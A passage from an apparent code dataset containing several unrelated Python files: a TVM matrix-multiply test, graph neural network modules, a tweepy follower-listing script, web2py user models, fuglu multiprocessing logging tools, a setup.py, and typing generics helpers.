print(func.imported_modules[0].get_source('ir'))\n print('------------------- device module 1 uop: ')\n print(func.imported_modules[0].get_source('uop'))\n # exit(0)\n\n ctx = tvm.nd.TVMContext(13, 0)\n a_np = np.random.randint(size=shape1, dtype=a.dtype, low = -16, high = 16)\n # a_np = np.ones(shape1, dtype=a.dtype)\n a_nd = tvm.nd.array(a_np, ctx)\n b_np = np.random.randint(size=shape2, dtype=b.dtype, low = -16, high = 16)\n # b_np = np.ones(shape2, dtype=b.dtype)\n b_nd = tvm.nd.array(b_np, ctx)\n bias_np = np.random.randint(size=(shape2[1], ), dtype=bias.dtype, low = -128, high = 127)\n # bias_np = np.ones((shape2[1], ), dtype=bias.dtype)\n bias_nd= tvm.nd.array(bias_np, ctx)\n\n out_nd = tvm.nd.array(np.zeros(out_shape_tiled, dtype=out_host.dtype), ctx)\n\n func(a_nd, b_nd, bias_nd, out_nd)\n\n gt = np.matmul(a_np, b_np.transpose(), dtype='int16')+bias_np\n gt = gt.astype(np.int8)\n out_np = out_nd.asnumpy()\n # print(out_np)\n out_np = np.transpose(out_np, axes=(0, 2, 1, 3))\n out_np = np.reshape(out_np, (128, 1024))\n np.testing.assert_allclose(gt, out_np)\n print('test passed')","sub_path":"nnpu/tests/article_demos/gemm-davinci.py","file_name":"gemm-davinci.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"606195626","text":"from typing import Callable\n\nimport torch\nimport torch.nn.functional as F\nfrom dgl.nn.pytorch import TAGConv\nfrom torch import nn\n\n\nclass MLP(nn.Module):\n def __init__(\n self, in_dim: int, out_dim: int, activation: Callable = F.relu\n ):\n super(MLP, self).__init__()\n self.fc1 = nn.Linear(in_dim, 64)\n self.fc2 = nn.Linear(64, 64)\n self.fc3 = nn.Linear(64, out_dim)\n self.activation = activation\n\n def forward(self, x: torch.Tensor):\n x = 
self.activation(self.fc1(x))\n x = self.activation(self.fc2(x))\n return self.fc3(x)\n\n\nclass TAG(nn.Module):\n def __init__(\n self,\n in_dim: int,\n hidden_dim: int,\n out_dim: int,\n k: int = 2,\n activation: Callable = F.relu,\n ):\n super(TAG, self).__init__()\n self.layer1 = TAGConv(in_dim, hidden_dim, k, activation=activation)\n self.layer2 = TAGConv(hidden_dim, hidden_dim, k, activation=activation)\n self.layer3 = TAGConv(hidden_dim, out_dim, k, activation=activation)\n self.activation = activation\n\n def forward(self, graph, inputs):\n h = self.layer1(graph, inputs)\n h = self.activation(h)\n h = self.layer2(graph, h)\n h = self.activation(h)\n h = self.layer3(graph, h)\n return h\n","sub_path":"espaloma/redux/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"455448484","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 7 12:56:46 2017\n\n@author: oliverbeatson\n\"\"\"\n# Code adapted from http://tweepy.readthedocs.io/en/v3.5.0/\n# Code brings through list of followers for specified ID\n\nimport tweepy\nimport AccessKeys\nimport datetime\n\n# Uses keys from APP setup to access Twitter Account information\n# Access Keys held in seperate folder\n\nauth = tweepy.OAuthHandler(ConsumerKey, ConsumerSecret)\nauth.set_access_token(AccessToken, AccessTokenSecret)\n\n# Establishes API through tweepy\napi = tweepy.API(auth)\n\nsleeptime = 20\npages = tweepy.Cursor(api.followers, screen_name=\"******\").pages()\n\nwhile True:\n try:\n page = next(pages)\n except tweepy.TweepError:\n page = next(pages)\n except StopIteration:\n break\n \nfor user in page:\n print(user.screen_name)\n\n ","sub_path":"Followers_of_ID.py","file_name":"Followers_of_ID.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"110275939","text":"# -*- coding: utf-8 -*-\n\nfrom gluon.dal import Field\nfrom basemodel import BaseAuth, BaseModel\nfrom gluon.validators import IS_NOT_IN_DB, IS_IN_SET, IS_EMPTY_OR, IS_DATE, IS_URL, IS_SLUG, IS_NOT_EMPTY\nfrom helpers.images import THUMB2\nfrom gluon import CAT, A, IMG, XML, DIV, P\n\n\nclass User(BaseAuth):\n def set_properties(self):\n request = self.db.request\n T = self.db.T\n self.fields = [\n # Person info\n Field(\"nickname\", notnull=True),\n Field(\"tagline\"),\n Field(\"twitter\", \"string\"),\n Field(\"facebook\", \"string\"),\n Field(\"website\", \"string\"),\n Field(\"avatar\", \"upload\"),\n Field(\"thumbnail\", \"upload\"),\n Field(\"photo_source\", \"integer\", default=1),\n Field(\"about\", \"text\"),\n Field(\"gender\", \"string\"),\n Field(\"birthdate\", \"date\"),\n # Preferences\n Field(\"privacy\", \"integer\", notnull=True, default=1), # 1 = public, 2 = contacts, 3 = private\n Field(\"facebookid\", \"string\"),\n Field(\"registration_type\", \"integer\", notnull=True, default=1), # 1 = local, 2 = Facebook\n # counters\n Field(\"articles\", \"integer\", notnull=True, default=0),\n Field(\"draft_articles\", \"integer\", notnull=True, default=0),\n Field(\"messages\", \"integer\", notnull=True, default=0),\n Field(\"draft_messages\", \"integer\", notnull=True, default=0),\n Field(\"unread_messages\", \"integer\", notnull=True, default=0),\n Field(\"sent_messages\", \"integer\", notnull=True, default=0),\n Field(\"comments\", \"integer\", notnull=True, default=0),\n Field(\"rating_count\", \"integer\", 
notnull=True, default=0),\n Field(\"rating_total\", \"integer\", notnull=True, default=0),\n Field(\"rating_average\", \"integer\", notnull=True, default=0),\n Field(\"threads\", \"integer\", notnull=True, default=0),\n Field(\"responses\", \"integer\", notnull=True, default=0),\n Field(\"groups\", \"integer\", notnull=True, default=0),\n Field(\"contacts\", \"integer\", notnull=True, default=0),\n Field(\"userpages\", \"integer\", notnull=True, default=0),\n Field(\"pictures\", \"integer\", notnull=True, default=0),\n Field(\"favorites\", \"integer\", notnull=True, default=0),\n Field(\"likes\", \"integer\", notnull=True, default=0),\n Field(\"dislikes\", \"integer\", notnull=True, default=0),\n Field(\"subscriptions\", \"integer\", notnull=True, default=0),\n # location\n Field(\"country\", \"string\"),\n Field(\"city\", \"string\"),\n Field(\"languages\", \"list:string\"),\n ]\n\n self.register_visibility = {\n \"nickname\": (True, True)\n }\n\n self.profile_visibility = {\n \"privacy\": (True, True),\n \"nickname\": (True, True),\n \"tagline\": (True, True),\n \"twitter\": (True, True),\n \"facebook\": (True, True),\n \"website\": (True, True),\n \"avatar\": (True, True),\n \"thumbnail\": (True, True),\n \"photo_source\": (True, True),\n \"about\": (True, True),\n \"gender\": (True, True),\n \"birthdate\": (True, True),\n \"country\": (True, True),\n \"city\": (True, True),\n \"languages\": (True, True),\n }\n\n self.computations = {\n \"thumbnail\": lambda r: THUMB2(r['avatar'], gae=request.env.web2py_runtime_gae),\n }\n\n self.labels = {\n \"first_name\": T(\"First Name\"),\n \"last_name\": T(\"Last Name\"),\n \"email\": T(\"E-mail\"),\n \"password\": T(\"Password\"),\n \"nickname\": T(\"Username\"),\n \"privacy\": T(\"Privacy\"),\n \"tagline\": T(\"Tagline\"),\n \"twitter\": T(\"twitter\"),\n \"facebook\": T(\"Facebook\"),\n \"website\": T(\"website\"),\n \"avatar\": T(\"avatar\"),\n \"photo_source\": T(\"Photo source\"),\n \"about\": T(\"about\"),\n \"gender\": T(\"Gender\"),\n \"birthdate\": T(\"Birth Date\"),\n \"country\": T(\"Country\"),\n \"city\": T(\"City\"),\n \"languages\": T(\"Languages\")\n }\n\n self.comments = {\n \"nickname\": T(\"Your desired username\"),\n \"privacy\": T(\"Your profile privacy\"),\n \"tagline\": T(\"A short sentence about you\"),\n \"twitter\": T(\"twitter account\"),\n \"facebook\": T(\"Facebook username or ID\"),\n \"website\": T(\"website or blog\"),\n \"avatar\": T(\"your profile picture\"),\n \"photo_source\": T(\"Which photo to use in your profile\"),\n \"about\": T(\"about you\"),\n \"gender\": T(\"Gender\"),\n \"birthdate\": T(\"Birth Date\"),\n \"country\": T(\"Country\"),\n \"city\": T(\"City\"),\n \"languages\": T(\"Languages you speak\")\n }\n\n def set_validators(self):\n config = self.db.config\n T = self.db.T\n request = self.db.request\n self.entity.nickname.requires = [IS_SLUG(), IS_NOT_IN_DB(self.db, self.entity.nickname)]\n self.entity.twitter.requires = IS_EMPTY_OR(IS_NOT_IN_DB(self.db, self.entity.twitter))\n self.entity.facebook.requires = IS_EMPTY_OR(IS_NOT_IN_DB(self.db, self.entity.facebook))\n\n self.entity.photo_source.requires = IS_IN_SET(config.get_list('auth', 'photo_source'))\n self.entity.gender.requires = IS_IN_SET(config.get_list('auth', 'gender'))\n self.entity.privacy.requires = IS_IN_SET(config.get_list('auth', 'privacy'))\n #date format not allowed on gae\n if not request.env.web2py_runtime_gae:\n self.entity.birthdate.requires = IS_EMPTY_OR(IS_DATE(format=str(T('%Y-%m-%d'))))\n\n self.entity.website.requires = 
IS_EMPTY_OR(IS_URL())\n\n\nclass UserBoard(BaseModel):\n tablename = \"user_board\"\n\n def set_properties(self):\n self.fields = [\n Field(\"user_id\", \"reference auth_user\"),\n Field(\"writer\", \"reference auth_user\"),\n Field(\"board_text\", \"string\"),\n ]\n\n self.visibility = {\n \"user_id\": (False, False),\n \"writer\": (False, False)\n }\n\n self.validators = {\n \"board_text\": IS_NOT_EMPTY()\n }\n\n def set_fixtures(self):\n self.entity._write_on_board = self.write_on_board\n\n def write_on_board(self, user_id, writer, text):\n self.entity.insert(user_id=user_id, writer=writer, board_text=text)\n self.db.commit()\n\n\nclass UserContact(BaseModel):\n tablename = \"user_contact\"\n\n def set_properties(self):\n self.fields = [\n Field(\"follower\", \"reference auth_user\"),\n Field(\"followed\", \"reference auth_user\"),\n ]\n\n def set_fixtures(self):\n self.entity._relation = self.relation\n\n def relation(self, a, b):\n if a == b:\n return 'yourself'\n a_follows_b = self.db((self.entity.follower == a) & ((self.entity.followed == b))).count()\n b_follows_a = self.db((self.entity.follower == b) & ((self.entity.followed == a))).count()\n if all([a_follows_b, b_follows_a]):\n return 'contacts'\n elif a_follows_b:\n return 'following'\n elif b_follows_a:\n return 'follower'\n else:\n return 'unknown'\n\n\nclass UserTimeLine(BaseModel):\n tablename = \"user_timeline\"\n\n def set_properties(self):\n self.fields = [\n Field(\"user_id\", \"reference auth_user\"),\n Field(\"nickname\", \"string\"),\n Field(\"event_type\", \"string\"),\n Field(\"event_to\", \"string\"),\n Field(\"event_reference\", \"integer\"),\n Field(\"event_text\", \"text\"),\n Field(\"event_image\", \"string\"),\n Field(\"event_link\", \"string\"),\n ]\n\n self.representation = {\n \"created_on\": lambda v: self.db.pdate(v)\n }\n\n def set_fixtures(self):\n self.entity._new_event = self.new_event\n\n def new_event(self, form=None, v=None):\n if not v:\n v = self.db.request.vars\n elif v == 'form':\n v = form.vars\n else:\n from gluon.storage import Storage\n v = Storage(v)\n\n event_text = v.event_text or v.comment_text or ' '\n data = dict(\n user_id=int(v.user_id),\n nickname=v.nickname,\n event_type=v.event_type,\n event_image=v.event_image,\n event_to=v.event_to,\n event_reference=int(v.event_reference),\n event_text=event_text[:50],\n event_link=v.event_link\n )\n self.entity.insert(**data)\n self.db.commit()\n","sub_path":"modules/datamodel/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":9441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"557329671","text":"# -*- coding: utf-8 -*-\n# Copyright 2009-2019 Fumail Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n#\n#\nimport logging\nimport logging.handlers\nimport logging.config\nimport os\nimport multiprocessing\nimport signal\nimport sys\n\n\ndef logFactoryProcess(listenerQueue,logQueue):\n \"\"\"\n This process is responsible for creating the logger listener for the 
given queue.\n This Listener process is responsible for actually handling all the log messages in the queue.\n\n You might ask why this is a separate process. This log-implementation satisfies two constraints:\n - it has to work in multiprocessing mode\n - it has to work with TimedRotatingFileHandler\n - it has to at least be possible to change the debug level down to DEBUG\n\n Even in multiprocessing the subprocess inherits a lot of things from its father process at creation time.\n Using the logging module this can create quite weird effects. Withoug any change, using a TimedRotatingFileHandler\n most processes might still write to the old (archived) log file while the process that actually rotated the file\n and its threads will write to the new one.\n If the separate log process is created directly as a child of the main process is it not possible to recreate the\n log process later to take into account a new configuration, even if using a config server listener. The messages\n received from other processes will not necessarily apply the correct debug level if this has been changed.\n\n The only \"clean\" solution found so far is to always create the logging process from a clean process which does not\n have any logging structure stored yet. Therefore, the logFactoryProcess is created at the very beginning and it\n can produce new clean logging processes later that will properly setup with all propagation and level changes.\n\n Args:\n listenerQueue (multiprocessing.Queue): Queue where the logFactoryProcess will receive a configuration for\n which a new logging process will be created replacint the old one\n logQueue (multiprocessing.Queue): The queue where log messages will be sent, handled finally by the logging\n process\n\n \"\"\"\n signal.signal(signal.SIGHUP, signal.SIG_IGN)\n\n loggerProcess = None\n while True:\n try:\n logConfig = listenerQueue.get()\n\n # if existing stop last logger process\n if loggerProcess:\n # try to close the old logger\n try:\n logQueue.put_nowait(None)\n loggerProcess.join(10) # wait 10 seconds max\n except Exception:\n loggerProcess.terminate()\n finally:\n loggerProcess = None\n\n if logConfig is None: # We send this as a sentinel to tell the listener to quit.\n break\n\n # create new logger process\n loggerProcess = multiprocessing.Process(target=listener_process, args=(logConfig,logQueue))\n loggerProcess.daemon = True\n loggerProcess.start()\n\n except KeyboardInterrupt:\n print(\"Listener process received KeyboardInterrupt\")\n #break\n except Exception:\n import sys, traceback\n print('LogFactoryProcess: Problem:', file=sys.stderr)\n traceback.print_exc(file=sys.stderr)\n\n # if existing stop last logger process\n if loggerProcess:\n # try to close the old logger\n try:\n logQueue.put_nowait(None)\n loggerProcess.join(10) # wait 10 seconds max\n except Exception:\n import sys, traceback\n loggerProcess.terminate()\n print('LogFactoryProcess: Problem:', file=sys.stderr)\n traceback.print_exc(file=sys.stderr)\n\n\nclass logConfig(object):\n \"\"\"\n Conig class to easily distinguish logging configuration for lint, foreground and production (from file)\n \"\"\"\n def __init__(self, lint=False, logConfigFile=\"none\", foreground=False, level=None):\n \"\"\"\n Setup in lint mode of using a config file\n Args:\n lint (bool): enable lint mode which will print on the screen\n logConfigFile (): load configuration from config file\n foreground (bool): enable foreground mode which will print on the screen like lint (but no level)\n \"\"\"\n # one option 
should be true\n assert ((1 if lint else 0) +\n (1 if foreground else 0) +\n (1 if logConfigFile != \"none\" else 0) == 1)\n\n self._configFile = logConfigFile\n if lint:\n self._level = logging.ERROR\n else:\n if level == \"DEBUG\":\n self._level = logging.DEBUG\n elif level == \"INFO\":\n self._level = logging.INFO\n elif level == \"ERROR\":\n self._level = logging.ERROR\n else:\n self._level = logging.NOTSET\n\n self._lint = lint\n self._foreground = foreground\n\n def configure(self):\n \"\"\"\n Configure for lint mode or from file. We can not set a \"pointer\" to the function\n ----\n if self._lint or self._foreground:\n self.configure = self._configure4screen\n elif self._configFile != \"none\":\n self.configure = self._configure\n else:\n raise Exception(\"Not implemented!\")\n ----\n because objects of this type are sent into the logger queue. Python 2.7 can then\n not pickle the instance.\n \"\"\"\n if self._lint or self._foreground:\n logConfig._configure4screen(self._level, timeinformat=self._foreground)\n elif self._configFile != \"none\":\n if not os.path.exists(self._configFile):\n raise FileNotFoundError(\"Logging config file %s does not exist!\" % self._configFile)\n\n logConfig._configure(self._configFile)\n else:\n raise Exception(\"Not implemented!\")\n\n @staticmethod\n def _configure4screen(outputlevel, timeinformat=False):\n \"\"\"\n Configure for stdout (output is on the screen)\n \"\"\"\n root = logging.getLogger()\n root.setLevel(logging.NOTSET)\n console = logging.StreamHandler(sys.stdout)\n console.setLevel(outputlevel)\n if timeinformat:\n formatter = logging.Formatter('[%(process)-5d] %(asctime)s : %(name)-25s: %(levelname)-s, %(message)s')\n else:\n # set a format which is simpler for console use\n formatter = logging.Formatter('[%(process)-5d] %(name)-25s: %(levelname)-s, %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n root.addHandler(console)\n\n @staticmethod\n def _configure(configFile):\n \"\"\"\n Configure logging using log configuration file\n \"\"\"\n logging.config.fileConfig(configFile)\n # get root logger once just to make sure this global configuration exists\n root = logging.getLogger()\n\n\ndef listener_process(configurer,queue):\n \"\"\"\n This is the listener process top-level loop: wait for logging events\n (LogRecords) on the queue and handle them, quit when you get a None for a\n LogRecord.\n\n Args:\n configurer (logConfig): instance lof logConfig class setting up logging on configure call\n queue (multiprocessing.Queue): The queue where log messages will be received and processed by this same process\n \"\"\"\n\n signal.signal(signal.SIGHUP, signal.SIG_IGN)\n\n configurer.configure()\n root = logging.getLogger()\n root.info(\"Listener process started\")\n logLogger = logging.getLogger(\"LogListener\")\n if logLogger.propagate:\n root.info(\"No special Log-logger\")\n logLogger = None\n else:\n root.info(\"Using special LogLogger\")\n\n while True:\n try:\n record = queue.get()\n if record is None: # We send this as a sentinel to tell the listener to quit.\n root.info(\"Listener process received poison pill\")\n break\n\n if logLogger:\n logLogger.debug(\"Approx queue size: %u, received record to process -> %s\"%(queue.qsize(),record))\n\n if queue.full():\n root.error(\"QUEUE IS FULL!!!\")\n if logLogger:\n logLogger.error(\"QUEUE IS FULL!!!\")\n\n logger = logging.getLogger(record.name)\n\n # check if this record should be logged or not...\n # the filter 
\n\n\ndef listener_process(configurer,queue):\n \"\"\"\n This is the listener process top-level loop: wait for logging events\n (LogRecords) on the queue and handle them, quit when you get a None for a\n LogRecord.\n\n Args:\n configurer (logConfig): instance of the logConfig class setting up logging on configure call\n queue (multiprocessing.Queue): The queue where log messages will be received and processed by this same process\n \"\"\"\n\n signal.signal(signal.SIGHUP, signal.SIG_IGN)\n\n configurer.configure()\n root = logging.getLogger()\n root.info(\"Listener process started\")\n logLogger = logging.getLogger(\"LogListener\")\n if logLogger.propagate:\n root.info(\"No special Log-logger\")\n logLogger = None\n else:\n root.info(\"Using special LogLogger\")\n\n while True:\n try:\n record = queue.get()\n if record is None: # We send this as a sentinel to tell the listener to quit.\n root.info(\"Listener process received poison pill\")\n break\n\n if logLogger:\n logLogger.debug(\"Approx queue size: %u, received record to process -> %s\"%(queue.qsize(),record))\n\n if queue.full():\n root.error(\"QUEUE IS FULL!!!\")\n if logLogger:\n logLogger.error(\"QUEUE IS FULL!!!\")\n\n logger = logging.getLogger(record.name)\n\n # check if this record should be logged or not...\n # the filter function should detect if the level is sufficient, but somehow it fails\n # so the check has to be done manually\n if logger.filter(record) and record.levelno >= logger.getEffectiveLevel():\n logger.handle(record)\n except KeyboardInterrupt:\n print(\"Listener process received KeyboardInterrupt\")\n root.warning(\"Listener received exception\")\n #break\n except Exception as e:\n root.warning(\"Listener received exception\")\n root.exception(e)\n root.info(\"Listener process stopped\")\n\n\ndef client_configurer(queue, level=\"NOTSET\"):\n \"\"\"\n The client configuration is done at the start of the worker process run.\n Note that on Windows you can't rely on fork semantics, so each process\n will run the logging configuration code when it starts.\n The log level is the minimum applied on the clients; the final decision\n will be applied on the log-listener. But if the base-level here is INFO\n then setting the level to \"DEBUG\" in \"logging.conf\" will not show DEBUG-level\n messages.\n\n Args:\n queue (multiprocessing.Queue): queue where to send log messages\n level (str): log-level (DEBUG, INFO, ERROR) for all the clients\n\n \"\"\"\n root = logging.getLogger()\n\n numRootHandlers = len(root.handlers)\n name = createPIDinfo()\n\n if numRootHandlers == 0:\n try:\n # Python 3\n h = logging.handlers.QueueHandler(queue) # Just the one handler needed\n except AttributeError:\n # Python 2\n h = QueueHandlerPy3Copy(queue)\n root.addHandler(h)\n # send all messages\n if level == \"DEBUG\":\n root.setLevel(logging.DEBUG)\n elif level == \"INFO\":\n root.setLevel(logging.INFO)\n elif level == \"ERROR\":\n root.setLevel(logging.ERROR)\n else:\n root.setLevel(logging.NOTSET)\n root.info(\"Log-Level \\\"%s\\\" not valid, setting NOTSET\" % level)\n root.info(\"(%s) Queue handler added to root logger\" % name)\n else:\n # on linux config is taken from the parent process automatically\n root.info(\"(%s) Root already has a handler -> not adding Queue handler\" % name)
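\n\n\n# --- Added: hedged worker-side usage sketch (illustrative only; never called) ---\n# A worker process would typically run client_configurer() once at startup and then\n# log normally; each record is forwarded through the queue to the listener process.\n# The function and argument names here are assumptions for illustration.\ndef _example_worker(logQueue):\n    client_configurer(logQueue, level=\"INFO\")\n    logging.getLogger(__name__).info(\"worker started, logging via the queue\")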
\n\n\n#----------------------------------------#\n#-- Copied from Python 3 - handlers.py --#\n#----------------------------------------#\nclass QueueHandlerPy3Copy(logging.Handler):\n \"\"\"\n This handler sends events to a queue. Typically, it would be used together\n with a multiprocessing Queue to centralise logging to file in one process\n (in a multi-process application), so as to avoid file write contention\n between processes.\n\n This code is new in Python 3.2, but this class can be copy pasted into\n user code for use with earlier Python versions.\n \"\"\"\n\n def __init__(self, queue):\n \"\"\"\n Initialise an instance, using the passed queue.\n \"\"\"\n logging.Handler.__init__(self)\n self.queue = queue\n\n def enqueue(self, record):\n \"\"\"\n Enqueue a record.\n\n The base implementation uses put_nowait. You may want to override\n this method if you want to use blocking, timeouts or custom queue\n implementations.\n \"\"\"\n self.queue.put_nowait(record)\n\n def prepare(self, record):\n \"\"\"\n Prepares a record for queuing. The object returned by this method is\n enqueued.\n\n The base implementation formats the record to merge the message\n and arguments, and removes unpickleable items from the record\n in-place.\n\n You might want to override this method if you want to convert\n the record to a dict or JSON string, or send a modified copy\n of the record while leaving the original intact.\n \"\"\"\n # The format operation gets traceback text into record.exc_text\n # (if there's exception data), and also puts the message into\n # record.message. We can then use this to replace the original\n # msg + args, as these might be unpickleable. We also zap the\n # exc_info attribute, as it's no longer needed and, if not None,\n # will typically not be pickleable.\n self.format(record)\n record.msg = record.message\n record.args = None\n record.exc_info = None\n return record\n\n def emit(self, record):\n \"\"\"\n Emit a record.\n\n Writes the LogRecord to the queue, preparing it for pickling first.\n \"\"\"\n try:\n self.enqueue(self.prepare(record))\n except Exception:\n self.handleError(record)\n\n\ndef createPIDinfo():\n infoString = \"\"\n if hasattr(os, 'getppid'): # only available on Unix\n infoString += 'parent process: %u, ' % os.getppid()\n infoString += 'process id: %u' % os.getpid()\n return infoString\n\n\nclass PrependLoggerMsg(object):\n \"\"\"Prepend something to all log messages of original logger, for example fuglu id\"\"\"\n def __init__(self, origlogger, prepend,\n prependseparator=\" \",\n maxlevel=None,\n minlevel=None\n ):\n self._origlogger = origlogger\n self.prepend = prepend\n self.prependseparator = prependseparator\n assert minlevel in [logging.DEBUG, logging.WARNING, logging.INFO, logging.ERROR, None]\n assert maxlevel in [logging.DEBUG, logging.WARNING, logging.INFO, logging.ERROR, None]\n minlevel = minlevel if minlevel is not None else -1000\n maxlevel = maxlevel if maxlevel is not None else 1000\n\n self.debuglevel = max(min(logging.DEBUG, maxlevel), minlevel)\n self.infolevel = max(min(logging.INFO, maxlevel), minlevel)\n self.warninglevel = max(min(logging.WARNING, maxlevel), minlevel)\n self.errorlevel = max(min(logging.ERROR, maxlevel), minlevel)\n self.criticallevel = max(min(logging.CRITICAL, maxlevel), minlevel)\n\n self.origroutines = {\n logging.DEBUG: self._origlogger.debug,\n logging.INFO: self._origlogger.info,\n logging.WARNING: self._origlogger.warning,\n logging.ERROR: self._origlogger.error,\n logging.CRITICAL: self._origlogger.critical\n }\n\n def debug(self, msg, *args, **kwargs):\n self.origroutines[self.debuglevel](\"%s%s%s\" % (self.prepend, self.prependseparator, msg), *args, **kwargs)\n\n def info(self, msg, *args, **kwargs):\n self.origroutines[self.infolevel](\"%s%s%s\" % (self.prepend, self.prependseparator, msg), *args, **kwargs)\n\n def warning(self, msg, *args, **kwargs):\n self.origroutines[self.warninglevel](\"%s%s%s\" % (self.prepend, self.prependseparator, msg), *args, **kwargs)\n\n def error(self, msg, *args, **kwargs):\n self.origroutines[self.errorlevel](\"%s%s%s\" % (self.prepend, self.prependseparator, msg), *args, **kwargs)\n\n def critical(self, msg, *args, **kwargs):\n self.origroutines[self.criticallevel](\"%s%s%s\" % (self.prepend, self.prependseparator, msg), *args, **kwargs)\n\n def exception(self, msg, *args, **kwargs):\n self._origlogger.exception(\"%s%s%s\" % (self.prepend, self.prependseparator, msg), *args, **kwargs)\n\n def __getattr__(self, attr):\n \"\"\"if attribute doesn't exist __getattr__ is called, redirect to wrapped 
logger\"\"\"\n return getattr(self._origlogger, attr)\n\n\nclass LoggingContext(object): \n \"\"\"to be used for 'with'-statements to temporarily change a logger\"\"\"\n def __init__(self, logger, level=None, handler=None, close=True): \n self.logger = logger \n self.level = level \n self.handler = handler \n self.close = close \n \n def __enter__(self): \n if self.level is not None: \n self.old_level = self.logger.level \n self.logger.setLevel(self.level) \n if self.handler: \n self.logger.addHandler(self.handler) \n \n def __exit__(self, et, ev, tb): \n if self.level is not None: \n self.logger.setLevel(self.old_level) \n if self.handler: \n self.logger.removeHandler(self.handler) \n if self.handler and self.close: \n self.handler.close()","sub_path":"fuglu/src/fuglu/logtools.py","file_name":"logtools.py","file_ext":"py","file_size_in_byte":17378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"492705295","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright (c) 2013 Spotify AB\n\nimport os.path\n\nfrom spotify_build.build import setup, BuildProtobuf\n\n# BuildProtobuf defaults to /usr/share/, which is bad for Debian\n# and Mac OS X installations (in package libprotobuf-dev. {deb})\nincpaths = set([\n '/usr/include',\n '/usr/local/include'\n])\n\nfor include_path in incpaths:\n if os.path.exists(include_path + '/google/protobuf/descriptor.proto'):\n os.environ['PROTOBUFPATH'] = include_path\n\nsetup(\n name='spotify-spire-pythonlib',\n version='1',\n author=u'Tommie Gannert',\n author_email='tommie@spotify.com',\n url='https://wiki.spotify.net/wiki/Python_packaging_policy',\n description='Spotify Internal Remote Execution Python library',\n packages=[\n 'spotify_spire',\n ],\n cmdclass=dict(protoc=BuildProtobuf),\n build_protobuf=[\n ('proto/spire.proto', 'spotify_spire/spire_pb2.py'),\n ],\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"481999106","text":"import logging\nimport sys\nimport typing\nfrom collections.abc import Callable as abcCallable\n\nP38 = sys.version_info[:3] >= (3, 8, 0)\nP37 = sys.version_info[:2] == (3, 7)\n\nif not P38:\n logging.getLogger(\"compose.generics\").warning(\"Version before 3.8 detected generics may not behave well\")\n\n__all__ = ['get_generic_type',\n 'is_generic_type',\n 'get_bound',\n 'get_parameters',\n 'get_origin']\n\n\ndef get_parameters(tp):\n \"\"\"Return type parameters of a parameterized type as a tuple.\n \"\"\"\n try:\n return tp.__parameters__ if tp.__parameters__ is not None else ()\n except:\n return ()\n\n\ntry:\n get_origin = typing.get_origin\nexcept:\n def get_origin(tp):\n \"\"\"Get the unsubscripted version of a type. Supports generic types, Union,\n Callable, and Tuple. Returns None for unsupported types. Examples::\n \"\"\"\n if isinstance(tp, typing._GenericAlias):\n return tp.__origin__ if tp.__origin__ is not typing.ClassVar else None\n if tp is typing.Generic:\n return typing.Generic\n return None\n\ntry:\n get_args = typing.get_args\nexcept:\n def get_args(tp, evaluate=None):\n \"\"\"Get type arguments with all substitutions performed. For unions,\n basic simplifications used by Union constructor are performed.\n On versions prior to 3.7 if `evaluate` is False (default),\n report result as nested tuple, this matches\n the internal representation of types. 
If `evaluate` is True\n (or if Python version is 3.7 or greater), then all\n type parameters are applied (this could be time and memory expensive).\n Examples::\n\n\n \"\"\"\n if evaluate is not None and not evaluate:\n raise ValueError('evaluate can only be True in Python 3.7')\n if isinstance(tp, typing._GenericAlias):\n res = tp.__args__\n if get_origin(tp) is abcCallable and res[0] is not Ellipsis:\n res = (list(res[:-1]), res[-1])\n return res\n return ()\n\n\ndef get_generic_bases(tp):\n \"\"\"Get generic base types of a type or empty tuple if not possible.\n \"\"\"\n org = getattr(tp, '__origin__', None)\n if org:\n a = (org,)\n else:\n a = ()\n return a + getattr(tp, \"__orig_bases__\", ())\n\n\ndef is_generic_type(kls):\n \"\"\"Test if the given type is a generic type. This includes Generic itself, but\n excludes special typing constructs such as Union, Tuple, Callable, ClassVar.\n See Unit tests for examples and expected outcomes.\n \"\"\"\n if isinstance(kls, typing._GenericAlias):\n if isinstance(kls.__origin__, typing._SpecialForm) or kls.__origin__ == abcCallable:\n return False\n return True\n # noinspection PyTypeHints\n return isinstance(kls, type) and issubclass(kls, typing.Generic)\n\n\ndef resolve_type(cls, type_name, parent=None):\n if isinstance(type_name, str) and type_name[0] != \"~\":\n type_name = \"~\" + type_name\n for base in get_generic_bases(cls):\n res = resolve_type(base, type_name, parent=cls)\n if res is not None and str(res) != str(type_name):\n return res\n\n for idx, parm in enumerate(get_parameters(cls)):\n if str(parm) == str(type_name):\n try:\n return get_args(parent)[idx]\n except IndexError:\n pass\n return None\n\n\ndef is_optional(kls):\n \"\"\"Returns `True` if the type is `type(None)` or has a Union including None, like Optional[...]; nested `Union`\n arguments are inspected.\n\n `TypeVar` edge case:\n `TypeVar` definitions are not inspected. If only the bound/constraint of a typevar is Optional, is_optional\n will return False. (see edge case test for clarity)\n \"\"\"\n\n if kls is type(None):\n return True\n return any(is_optional(sub_kls) for sub_kls in get_args(kls))\n\n\n# Simple accessors instead of accessing __ attributes, as they tend to change a bit right now.\n\ndef 